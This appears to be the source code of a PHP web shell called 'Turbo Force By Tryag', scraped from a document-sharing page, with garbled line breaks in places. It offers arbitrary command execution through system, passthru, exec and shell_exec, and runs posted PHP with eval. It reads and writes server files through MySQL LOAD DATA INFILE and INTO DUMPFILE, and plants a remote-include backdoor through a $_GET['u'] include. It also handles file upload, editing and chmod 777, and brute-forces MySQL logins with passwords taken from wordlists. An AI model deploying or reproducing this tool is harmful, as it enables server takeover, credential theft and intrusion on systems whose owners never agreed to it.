Sie sind auf Seite 1von 24

<?

php
header('Content-Type: text/html; charset=windows-1256');
/*
Turbo Force By Tryag.Cc
*/
@set_time_limit(0);
@error_reporting(0);
if($_POST['page']=='chmod')
{
$pathclass=$_POST[pathclass];
$namefile=$_POST[namefile];
if(chmod($pathclass,$namefile))
{
echo '<center><b> ';
}else{
echo '<center><b>';
}
exit;
}
if($_POST['page']=='file_mysql')
{
$connect = mysql_connect('localhost',$_POST['mysql_l'], $_POST['mysql_p']);
mysql_select_db($_POST['mysql_db'],$connect);
$query = "CREATE TABLE `ttt` (`wwww` TEXT NOT NULL) ENGINE = MYISAM ;";
if(mysql_query($query))
{
$codes=$_POST[codes];
$query2 = "INSERT INTO `ttt` (`wwww`)VALUES('$codes');";
if(mysql_query($query2))
{
$pathclass = $_POST['pathclass'];
if(mysql_query(stripslashes("select * into dumpfile '$pathclass' from ttt")))
{
echo " <br>$pathclass";
$query4 = "DROP TABLE `ttt`";
mysql_query($query4);
}else{
$error = mysql_error();
echo "<br>$error";
}
}else{echo ' ';
$query4 = "DROP TABLE `ttt`";
mysql_query($query4);
}
}
$query4 = "DROP TABLE `ttt`";
mysql_query($query4);
exit;
}
if($_POST['page']=='read_mysql')
{

$unique = uniqid('N');
$file = $_POST['pathclass'];
$query = array( "CREATE TEMPORARY TABLE $unique (file LONGBLOB)", "LOAD DATA INF
ILE '".mysql_real_escape_string($file)."' INTO TABLE $unique", "SELECT * FROM $u
nique" );
$connect = mysql_connect('localhost',$_POST['mysql_l'], $_POST['mysql_p']);
mysql_select_db($_POST['mysql_db'],$connect);
echo '<textarea name="db_query" style="width: 800px; height: 400px;" dir="ltr">'
;
foreach($query as $Allqueries)
{
$mysqlQuery = mysql_query($Allqueries,$connect);
while($line = @mysql_fetch_row($mysqlQuery))
echo htmlspecialchars($line[0]);
}
echo '</textarea>';
exit;
}
if($_POST['page']=='download')
{
$namefile=$_POST['namefile'];
if($_POST['namefile']==null)
{
$test1=explode(".",$pathclass);
if(strpos($test1[0],"\\"))
{
$test2=explode("\\\\",$test1[0]);
}else{
$test2=explode("/",$test1[0]);
}
$st=count($test2);
$st=$st-1;
$namefile=$test2[$st].'.'.$test1[1];
}
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($namefile));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($namefile));
ob_clean();
flush();
readfile($pathclass);
exit;
}
echo '
<html dir="rtl">
<head>

<style type="text/css">
.style1 {

font-weight: bold;
direction: rtl;
}
<!-body {
background-color: #000000;
font-size: 18px;
color: #cccccc;
}
input,textarea,select{
font-weight: bold;
color: #cccccc;
dashed #ffffff;
border: 1px
solid #2C2C2C;
background-color: #080808
}
a {
background-color: #151515;
vertical-align: bottom;
color: #000;
text-decoration: none;
font-size: 20px;
margin: 8px;
padding: 6px;
border: thin solid #000;
}
a:hover {
background-color: #080808;
vertical-align: bottom;
color: #333;
text-decoration: none;
font-size: 20px;
margin: 8px;
padding: 6px;
border: thin solid #000;
}
.style1 {
text-align: center;
}
.style2 {
color: #FFFFFF;
font-weight: bold;
}
.style3 {
color: #FFFFFF;
}
-->
</style>
</head>
';
function in($type,$name,$size,$value,$checked=0)
{
$ret = "<input type=".$type." name=".$name." "; if($size != 0)
{
$ret .= "size=".$size." "; }

$ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">


"; }
class my_sql
{
var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $b
ase = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $c
olumns; var $num_rows; var $num_fields; var $dump; function connect()
{
switch($this->db)
{
case 'MySQL': if(empty($this->port))
{
$this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_conn
ect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->
connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break
; case 'MSSQL': if(empty($this->port))
{
$this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_conn
ect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection)
return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if
(empty($this->port))
{
$this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' pa
ssword='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_conn
ect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->co
nnection)) return 1; $this->error = @pg_last_error($this->connection); break; ca
se 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @oci
logon($this->user, $this->pass, $this->base); if(is_resource($this->connection))
return 1; $error = @ocierror(); $this->error=$error['message']; break; }
return 0; }
function select_db()
{
switch($this->db)
{
case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $th
is->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_
select_db($this->base,$this->connection)) return 1; $this->error = "Can't select
database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1;
break; }
return 0; }
function query($query)
{
$this->res=$this->error=''; switch($this->db)
{
case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this
->connection)))
{
$this->error = @mysql_error($this->connection); return 0; }
else if(is_resource($this->res))
{
return 1; }
return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this
->connection)))
{
$this->error = 'Query error'; return 0; }
else if(@mssql_num_rows($this->res) > 0)

{
return 1; }
return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->con
nection,$query)))
{
$this->error = @pg_last_error($this->connection); return 0; }
else if(@pg_num_rows($this->res) > 0)
{
return 1; }
return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connect
ion,$query)))
{
$this->error = 'Query parse error'; }
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2; return 1; }
$error = @ocierror(); $this->error=$error['message']; }
break; }
return 0; }
function get_result()
{
$this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=
0; switch($this->db)
{
case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@m
ysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc
($this->res))); @mysql_free_result($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fi
elds=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetc
h_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num
_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_a
ssoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !=
= ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreesta
tement($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
break; }
return 0; }
function dump($table)
{
if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->
dump[1] = '## --------------------------------------- '; $this->dump[2] = '## C
reated: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $t
his->dump[4] = '##
Table: '.$table; $this->dump[5] = '## -------------------------------------- '; switch($this->db)
{
case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/
SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return
0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## -------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * F

ROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<


$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v)
{
$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).
'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT
* FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$t
his->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v)
{
$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VA
LUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->quer
y('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for(
$i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v)
{
$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VA
LUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## un
der construction'; break; default: return 0; break; }
return 1; }
function close()
{
switch($this->db)
{
case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_clos
e($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); br
eak; case 'Oracle': @oci_close($this->connection); break; }
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': ret
urn @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affec
ted_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); bre
ak; default: return 0; break; }
}
}
if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['
d_name']))
{
if(!$file=@fopen($_POST['d_name'],"r"))
{
err(1,$_POST['d_name']); $_POST['cccc']=""; }
else
{
@ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,
@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; co
mpress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
{
header('Content-Encoding: ' . $content_encoding); }

header("Content-type: ".$mime_type); header("Content-disposition: attachment; f


ilename=\"".$filename."\";"); echo $filedump; exit(); }
}
if(isset($_GET['phpinfo']))
{
echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a
href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
{
echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['
db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sq
l->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode
(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) ec
ho "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b
></font></div>"; else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=V
erdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialc
hars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
{
case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b
>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_re
sult())
{
echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] =
htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bg
color=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><
td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font
></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_
QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&n
bsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.
'&nbsp;</font></td></tr>'; }
echo "</table>"; }
break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); ech
o "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar
."</b></font></td></tr></table><br>"; break; }
}
}
}
}
echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['d
b_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','
mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db
_query');
echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input
type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea
cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query'])
:("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit na
me=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><
div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].

">BACK</a> ]</b></font></div>"; die(); }

function ccmmdd($ccmmdd2,$att)
{
global $ccmmdd2,$att;
echo '
<table style="width: 100%" class="style1" dir="rtl">
<tr>
<td class="style9"><strong> </strong></td>
</tr>
<tr>
<td class="style13">
<form method="post">
<select name="att" dir="rtl" style="heig
ht: 109px" size="6">
';
if($_POST['att']==null)
{
echo '
<option value="system" selected=
"">system</option>';
}else{
echo "
<option value='$_POST[att]' sele
cted=''>$_POST[att]</option>
<option value=system>system</opt
ion>
";
}
echo '
<option value="passthru">passthr
u</option>
<option value="exec">exec</optio
n>
<option value="shell_exec">shell
_exec</option>
</select>

<input name="page" value="ccmmdd


" type="hidden"><br>
<input dir="ltr" name="ccmmdd2"
style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}els
e{echo $_POST['ccmmdd2'];}echo '"><br>
<input type="submit" value="">
</form>
</td>
</tr>
<tr>
<td class="style13">
';
if($_POST[att]=='system')
{
echo '
<textarea dir="ltr" name="TextArea1" sty
le="width: 745px; height: 204px">';
system($_POST['ccmmdd2']);
</textarea>';

echo '
}

if($_POST[att]=='passthru')
{
echo '
<textarea dir="ltr" name="TextArea1" sty
le="width: 745px; height: 204px">';
passthru($_POST['ccmmdd2']);
</textarea>';

echo '
}

if($_POST[att]=='exec')
{
echo '
le="width: 745px; height: 204px">';

<textarea dir="ltr" name="TextArea1" sty

exec($_POST['ccmmdd2'],$res);
echo $res = join("\n",$res);
</textarea>';

echo '
}

if($_POST[att]=='shell_exec')
{

echo '
le="width: 745px; height: 204px">';
echo
echo '

<textarea dir="ltr" name="TextArea1" sty


shell_exec($_POST['ccmmdd2']);
</textarea>';

}
echo '
</td>
</tr>
</table>
';
exit;
}
if($_POST['page']=='edit')
{
$code=@str_replace("\r\n","\n",$_POST['code']);
$code=@str_replace('\\','',$code);
$fp = fopen($pathclass, 'w');
fwrite($fp,"$code");
fclose($fp);
echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a
>";
exit;
}
if($_POST['page']=='upload')
{
if($_FILES['img']['size'] > 0)
{
$path=$_POST['pathclass'];
$name=$_FILES['img']['name'];
if(strpos($path,"\\"))
{
$folder = $path."\\\\".basename($name);
}else{
$folder = $path."/".basename($name) ;
}
move_uploaded_file($_FILES['img']['tmp_name'],$folder);
if(strpos($path,"\\"))
{
echo '<center><b>Yes<br>'."$path\\\\$name";
}else{
echo '<center><b>Yes<br>'."$path/$name";
}
}else{
echo '<center><b>Error :No Enter File';
}
exit;
}

if($_POST['page']=='showdir')
{
$pathclass =$_POST['pathclass'];
$pathclass = str_replace('\\\\','\\',$pathclass);
echo '
<form method="POST">
<input name="pathclass" type="text" style="width: 284px" value="'.$pathc
lass.'" dir=ltr><input type="submit" value="">
<input name="page" type="hidden" value="showdir">
</form>
<br>
';
function format_bytes($bytes) {
if ($bytes < 1024) return $bytes.' B';
elseif ($bytes < 1048576) return round($bytes / 1024, 2).' KB';
elseif ($bytes < 1073741824) return round($bytes / 1048576, 2).' MB';
elseif ($bytes < 1099511627776) return round($bytes / 1073741824, 2).' GB';
else return round($bytes / 1099511627776, 2).' TB';
}
$files1 = scandir($pathclass);
echo '
<table border="1" width="100%" dir="ltr">
<tr>
<td>
<p align="center"><b><span lang="en-us">name</span></b></td>
<td>
<p align="center"><span lang="en-us"><b>size</b></span></td>
<td>
<p align="center"><b><span lang="en-us">chmod</span></b></td>
<td>
<p align="center"><b><span lang="en-us">read or edit</span></b><
/td>
<td>
<p align="center"><b><span lang="en-us">dowload</span></b></td>
</tr>
';
foreach($files1 as $f)
{
/*
echo "$f<br>";
$f=@filesize($f);
echo format_bytes($f);
*/
$fff="$pathclass$f";
$ff=@filesize($fff);
echo '
<tr>
<td>
<p align="center">'.$f.'</td>
<td>
<p align="center">'.format_bytes($ff).'</td>

<td>
<p align="center">
';
if($f=='.'||$f=='..')
{
}else{
echo '
<form method="POST" target="_blank">
<p align="center">
<input name="namefile" type="text" value="777" style="width: 45px;">
<input type="submit" value="" >
<input name="pathclass" type="hidden" value="'.$fff.'">
<input name="page" type="hidden" value="chmod">
</form>
';
}
echo '
</td>
<td>';
if($f=='.'||$f=='..')
{
//no
}elseif(strpos($f,".")){
echo '
<form method="POST" target="_blank">
<p align="center">
<input type="submit" value="">
<input name="pathclass" type="hidden" value="'.$fff.'">
<input name="page" type="hidden" value="show">
</p>
</form>
';
}
echo '

</td>
<td>
';
if($f=='.'||$f=='..')
{
}else{
echo '
<form method="POST" target="_blank">
<p align="center">
<input type="submit" value="">
<input name="pathclass" type="hidden" value="'.$fff.'">
<input name="namefile" type="hidden" value="'.$f.'">
<input name="page" type="hidden" value="download">
</form>
</p>
';
}
echo'

</td>

</tr>
';
}
echo '</table>';
exit;
}

if($_POST['page']=='code')
{
$code=$_POST[code];
$code=str_replace('\\','',$code);
eval($code);
exit;
}

if($_POST['page']=='show')
{
$pathclass =$_POST['pathclass'];
echo '
<form method="POST">
<input type="hidden" name="page" value="edit">
';
$sahacker = fopen($pathclass, "rb");
echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 84
5px; height: 404px">';
$code = fread($sahacker, filesize($pathclass));
echo $code =htmlspecialchars($code);
echo '</textarea>';
fclose($sahacker);
echo '
<br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445
px;">
<br><strong><input type="submit" value="edit file">
</form>
';
exit;
}

if($_POST['page']=='ccmmdd')
{
echo ccmmdd($ccmmdd2,$att);
exit;
}

if($_POST['page']=='find')
{
if(isset($_POST['usernames']) && isset($_POST['passwords']))
{
if($_POST['type'] == 'passwd'){
$e = explode("\n",$_POST['usernames']);
foreach($e as $value){
$k = explode(":",$value);
$username .= $k['0']." ";
}
}elseif($_POST['type'] == 'simple'){
$username = str_replace("\n",' ',$_POST['usernames']);
}elseif($_POST['type'] == 'file'){
$username = str_replace("\n",' ',$_POST['usernames']);
$namefile=$_POST['namefile'];
$handle1 = fopen($namefile, "r");
$_POST['passwords'] = fread($handle1, filesize($namefile));
fclose($handle1);
}elseif($_POST['type'] == 'url'){
$username = str_replace("\n",' ',$_POST['usernames']);
$ch = curl_init($_POST['namefile2']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$_POST['passwords'] = curl_exec($ch);
/*
$contextOptions['http'] = array('method' => 'GET', 'max_redirects'=>0, '
protocol_version'=> 1.0, 'timeout'=>10, 'ignore_errors'=>TRUE);
$contextResouce = stream_context_create($contextOptions);
$url = $_POST['namefile2'];
$handle = fopen("$url", 'r', false, $contextResouce);
$_POST['passwords'] = stream_get_contents($handle);
*/
}

$a1 = explode(" ",$username);


$a2 = explode("\n",$_POST['passwords']);
$id2 = count($a2);
$ok = 0;
foreach($a1 as $user )
{
if($user !== '')
{
$user=trim($user);
for($i=0;$i<=$id2;$i++)
{
$pass = trim($a2[$i]);
$server=$_POST['server'];
if(@mysql_connect("$server","$user","$pass"))
{
echo "<b dir=rtl> (<b><font color=green>$user</
/b>)<br />";
$ok++;
}
}
}
}
echo "<hr><b> <font color=green>$ok</font> </b>";
echo "<center><b><a href=".$_SERVER['PHP_SELF']."> </a>";
exit;
}
}
?>

<body style="color: #FFFFFF">

<form method="POST" target="_blank">


<strong>
<input name="page" type="hidden" value="find">
</strong>
<table width="600" border="0" cellpadding="3" cellspacing="1" align="center"
>
<tr>
<td valign="top" bgcolor="#151515"><center><strong><img src="http://www.
upload-big.info/upload/7bbc23e8434e69fef6f87e4c58d387e0.gif" /><br>
</strong>
<strong>

<a href="http://tryag.cc" class="style2"> </


<span lang="ar-sa"><strong>
</tr>
<tr>
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center
">
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<strong> :</strong></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" r
ows="10" name="usernames" dir="ltr">root
admin
password
demo
admin123
cpanel
passwd
user
pass
123123
123456
1234567
12345678
user1
user2</textarea></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<strong> :</strong></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" r
ows="10" name="passwords" dir="ltr">1
root
admin
password
demo
admin123
cpanel
passwd
user
pass
123123
123456
1234567
12345678
user1
user2
12345
123456
1234567
12345678
123456789
1234567890
121212
123454321
123661
12233456
0987654321
aa123456
a123456
asa12345

km217764
1363834281
141545512645
24189248214
2469182561
240146385
23569238592
23586293561951
192571025891265981
1256192856192856106
156192856
1856151
158619865
1856127561
182561827561
aksgawfiaf
wqfaiuglugraf
wqruwfuqwrqrq
afulwurqrqrad
qwirrqwr
qwruiyf
d123456
12
123
1234
12345
123456
1234567
12345678
123456789
1234567890</textarea></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<strong> :</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<strong><input name="server" type="text" value="localhost"></strong></td>
</tr>

<tr>
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<strong> :</strong></td>
<td valign="top" bgcolor="#151515" colspan="5" class="style1">
<span class="style2">
<input type="radio" name="type" value="simple" checked="checked" class="styl
e1"><b> : <br>
</b> </span>
<input type="radio" name="type" value="passwd" class="style1">
<font class="style2"><b> /etc/passwd<br></b> </fo
<input type="radio" name="type" value="file" class="style1"><span class=
"style3">
<font class="style2"><b> ..
<input name="namefile" type="text" value="<?php echo realpath('')?>" sty
le="width: 245px" dir="ltr" ><br>
<input type="radio" name="type" value="url" class="style1">
e="text" value="http://www.ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt" sty
le="width: 245px" ><br>
<br>
http://www.ethicalhack3r.co.uk/files/fuzzing/phpbb.txt<br>
http://www.ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt</font></span

></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value=" ">
</strong>
</td>
<tr>
</form>
<td valign="top" colspan="6">&nbsp;</td>

<form method="POST" target="_blank">


<strong>
<input type="hidden" name="go" value="cmd_mysql">
</strong>
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"
dir="ltr"></strong></td>
<td valign="top" bgcolor="#151515"><strong></strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"
dir="ltr"></strong></td>
<td valign="top" bgcolor="#151515"><strong> </strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text
" dir="ltr"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
<strong> ~</strong></td>
<td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
<strong>
<textarea name="db_query" style="width: 353px; height: 89px" dir="ltr">S
HOW DATABASES;
SHOW TABLES user_vb ;
SELECT * FROM user;
SELECT version();
SELECT user();</textarea></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
<td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value=""></strong></td>
</tr>
<input name="db" value="MySQL" type="hidden">
<input name="db_server" type="hidden" value="localhost">
<input name="db_port" type="hidden" value="3306">
<input name="cccc" type="hidden" value="db_query">
</form>

<td valign="top" colspan="6">&nbsp;</td>

<form method="POST" target="_blank">


<strong>
</strong>
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> M
>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"
dir="ltr"></strong></td>
<td valign="top" bgcolor="#151515"><strong></strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"
dir="ltr"></strong></td>
<td valign="top" bgcolor="#151515"><strong> </strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text
" dir="ltr"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
<strong> ~</strong></td>
<td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
<strong>
<input name="pathclass" type="text" style="width: 284px" dir="ltr" valu
e="<?php echo realpath('')?>"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
<td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value=""></strong></td>
</tr>
<input type="hidden" name="page" value="read_mysql">
</form>

<td valign="top" colspan="6">&nbsp;</td>


<form method="POST" target="_blank">
<strong>
</strong>

<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
d>

</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"
dir="ltr"></strong></td>
<td valign="top" bgcolor="#151515"><strong></strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"
dir="ltr"></strong></td>
<td valign="top" bgcolor="#151515"><strong> </strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text
" dir="ltr"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
<strong> ~</strong></td>
<td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
<strong>
<textarea name="codes" style="width: 353px; height: 89px" dir="ltr" cols
="20" rows="1">&lt;?php include($_GET['u'])?&gt;</textarea><br>
<span lang="en-us"> file include </span>
<br><span lang="en-us">www.site.com/file.php?u=http://shell</span></st
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
<strong> ~</strong></td>
<td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
<strong>
<input name="pathclass" type="text" style="width: 284px" dir="ltr" valu
e="<?php echo realpath('')?>/file.php"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
<td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value=""></strong></td>
</tr>
<input type="hidden" name="page" value="file_mysql">
</form>

<tr>
<td valign="top" colspan="6">&nbsp;</td>
</tr>
<form method="POST" target="_blank">
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
system - passthru - exec - shell_exec</strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong> ~</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<select name="att" dir="rtl" size="1">
<?php
if($_POST['att']==null)

{
echo '
"">system</option>';
}else{
echo "
cted=''>$_POST[att]</option>

<option value="system" selected=


<option value='$_POST[att]' sele
<option value=system>system</opt

ion>
";
}
?>
<option value="passthru">passthr
u</option>
<option value="exec">exec</optio
n>
<option value="shell_exec">shell
_exec</option>
</select>
<strong>
<input name="page" type="hidden" value="ccmmdd">
<input name="ccmmdd2" type="text" style="width: 284px" value="ls -la" di
r="ltr"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
<td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value=""></strong></td>
</tr>
</form>
<form method="POST" target="_blank">
<tr>
<td valign="top" colspan="6">&nbsp;</td>
</tr>

<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong> ~</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<strong>
<input name="pathclass" type="text" style="width: 284px" dir="ltr" value
="<?php echo realpath('')?>"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
<td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value=""></strong></td>
</tr>
<input name="page" type="hidden" value="showdir">
</form>

<form method="POST" target="_blank">


<tr>
<td valign="top" colspan="6">&nbsp;</td>
</tr>

<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> </strong><
>

</tr>
